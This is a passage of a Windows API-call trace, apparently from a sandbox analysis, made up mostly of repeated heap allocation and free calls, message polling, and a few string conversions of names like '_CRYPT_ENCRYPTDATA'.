hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.698] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0189.698] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.698] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb4e0) returned 0xbea018 [0189.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb4e0) returned 0xc009e8 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0189.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.701] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0189.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0189.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0189.701] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0189.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0189.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.701] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2808 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0189.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0189.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.702] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.703] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0189.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0189.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.704] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0189.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0189.705] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.706] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0189.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0189.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0189.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 